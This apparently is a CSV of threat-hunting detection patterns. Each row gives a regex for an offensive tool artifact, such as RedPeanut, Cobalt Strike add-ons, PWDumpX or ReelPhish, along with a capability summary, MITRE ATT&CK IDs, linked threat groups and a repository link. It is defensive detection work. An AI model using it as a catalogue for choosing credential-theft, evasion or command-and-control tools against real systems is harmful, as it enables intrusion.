"*RedPeanutSpawnTikiTorch.cs*",".{0,1000}RedPeanutSpawnTikiTorch\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","56582"
"*RedPeanutVBAMacro.vba*",".{0,1000}RedPeanutVBAMacro\.vba.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","56583"
"*RedSiege/CIMplant*",".{0,1000}RedSiege\/CIMplant.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","Scattered Spider*","Lateral Movement","https://github.com/RedSiege/CIMplant","1","1","N/A","N/A","10","2","199","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z","56584"
"*RedSiege/GraphStrike*",".{0,1000}RedSiege\/GraphStrike.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005  - TA0011","N/A","Black Basta","C2","https://github.com/RedSiege/GraphStrike","1","1","N/A","N/A","10","10","585","95","2024-06-25T11:18:19Z","2024-01-02T00:18:44Z","56585"
"*redskal/SharpAzbelt*",".{0,1000}redskal\/SharpAzbelt.{0,1000}","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery","https://github.com/redskal/SharpAzbelt","1","1","N/A","N/A","8","1","26","7","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z","56586"
"*redsocks-fw.sh stop*",".{0,1000}redsocks\-fw\.sh\sstop.{0,1000}","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","0","#linux","N/A","9","3","287","30","2024-01-19T10:58:20Z","2022-03-23T12:27:07Z","56587"
"*Red-Team-Infrastructure-Wiki.*",".{0,1000}Red\-Team\-Infrastructure\-Wiki\..{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","N/A","10","10","304","53","2024-11-24T16:29:36Z","2018-02-12T16:23:23Z","56588"
"*Red-Teaming-Toolkit*",".{0,1000}Red\-Teaming\-Toolkit.{0,1000}","offensive_tool_keyword","Red-Teaming-Toolkit","A collection of open source and commercial tools that aid in red team operations. This repository will help you during red team engagement. If you want to contribute to this list send me a pull request","T1210 - T1211 - T1212 - T1547","TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/infosecn1nja/Red-Teaming-Toolkit","1","1","N/A","N/A","N/A","10","9454","2251","2025-04-14T02:23:20Z","2018-04-26T13:35:09Z","56589"
"*RedTeamPentesting/kbtls*",".{0,1000}RedTeamPentesting\/kbtls.{0,1000}","offensive_tool_keyword","resocks","resocks is a reverse/back-connect SOCKS5 proxy tunnel that can be used to route traffic through a system that can't be directly accessed","T1090.003 - T1090 - T1571","TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/RedTeamPentesting/resocks","1","1","N/A","N/A","8","10","437","33","2023-09-19T10:43:29Z","2023-05-02T08:42:15Z","56590"
"*RedTeamPentesting/pretender*",".{0,1000}RedTeamPentesting\/pretender.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","1","N/A","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","56591"
"*RedTeamPentesting/resocks*",".{0,1000}RedTeamPentesting\/resocks.{0,1000}","offensive_tool_keyword","resocks","resocks is a reverse/back-connect SOCKS5 proxy tunnel that can be used to route traffic through a system that can't be directly accessed","T1090.003 - T1090 - T1571","TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/RedTeamPentesting/resocks","1","1","N/A","N/A","8","10","437","33","2023-09-19T10:43:29Z","2023-05-02T08:42:15Z","56592"
"*RedWarden.py*",".{0,1000}RedWarden\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","N/A","10","10","964","143","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z","56593"
"*RedWarden.test*",".{0,1000}RedWarden\.test.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","N/A","10","10","964","143","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z","56594"
"*redwarden_access.log*",".{0,1000}redwarden_access\.log.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mgeeky/RedWarden","1","1","#logfile","N/A","10","10","964","143","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z","56595"
"*redwarden_redirector.log*",".{0,1000}redwarden_redirector\.log.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mgeeky/RedWarden","1","1","#logfile","N/A","10","10","964","143","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z","56596"
"*reedarvin@gmail.com*",".{0,1000}reedarvin\@gmail\.com.{0,1000}","offensive_tool_keyword","PWDumpX","PWDumpX tool allows a user with administrative privileges to retrieve the encrypted password hashes and LSA secrets from a Windows system. This tool can be used on the local system or on one or more remote systems.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://packetstormsecurity.com/files/download/52580/PWDumpX.zip","1","0","#email","N/A","10","8","N/A","N/A","N/A","N/A","56597"
"*ReelPhish*",".{0,1000}ReelPhish.{0,1000}","offensive_tool_keyword","ReelPhish","ReelPhish consists of two components: the phishing site handling code and this script. The phishing site can be designed as desired. Sample PHP code is provided in /examplesitecode. The sample code will take a username and password from a HTTP POST request and transmit it to the phishing script.  The phishing script listens on a local port and awaits a packet of credentials. Once credentials are received. the phishing script will open a new web browser instance and navigate to the desired URL (the actual site where you will be entering a users credentials). Credentials will be submitted by the web browser","T1566 - T1114 - T1071 - T1547 - T1546","TA0001 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/fireeye/ReelPhish","1","0","N/A","N/A","N/A","6","514","153","2023-08-11T01:40:07Z","2018-02-01T20:35:11Z","56598"
"*reflct_dll_inject.exe*",".{0,1000}reflct_dll_inject\.exe.{0,1000}","offensive_tool_keyword","darkarmour","Store and execute an encrypted windows binary from inside memorywithout a single bit touching disk.","T1055.012 - T1027 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/darkarmour","1","1","N/A","N/A","10","8","773","122","2020-04-13T10:56:23Z","2020-04-06T20:48:20Z","56600"
"*reflective_assembly_minified.ps1*",".{0,1000}reflective_assembly_minified\.ps1.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","N/A","private github repo","10","","N/A","","","","56601"
"*reflective_dll.dll*",".{0,1000}reflective_dll\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","N/A","10","10","540","86","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z","56602"
"*reflective_dll.dll*",".{0,1000}reflective_dll\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","56603"
"*reflective_dll.x64.dll*",".{0,1000}reflective_dll\.x64\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","reflective module for HackBrowserData","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/idiotc4t/Reflective-HackBrowserData","1","1","N/A","N/A","10","10","175","25","2021-03-13T08:42:18Z","2021-03-13T08:35:01Z","56604"
"*reflective_dll.x64.dll*",".{0,1000}reflective_dll\.x64\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","56605"
"*reflective_dll_inject*",".{0,1000}reflective_dll_inject.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","56606"
"*reflective_pe_loader.*",".{0,1000}reflective_pe_loader\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","56607"
"*ReflectiveDll.*",".{0,1000}ReflectiveDll\..{0,1000}","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","N/A","10","10","1213","204","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z","56608"
"*ReflectiveDll.x64.dll*",".{0,1000}ReflectiveDll\.x64\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Example code for using named pipe output with beacon ReflectiveDLLs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rxwx/cs-rdll-ipc-example","1","1","N/A","N/A","10","10","116","23","2020-06-24T19:47:35Z","2020-06-24T19:43:56Z","56609"
"*ReflectiveDll.x86.dll*",".{0,1000}ReflectiveDll\.x86\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Example code for using named pipe output with beacon ReflectiveDLLs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rxwx/cs-rdll-ipc-example","1","1","N/A","N/A","10","10","116","23","2020-06-24T19:47:35Z","2020-06-24T19:43:56Z","56610"
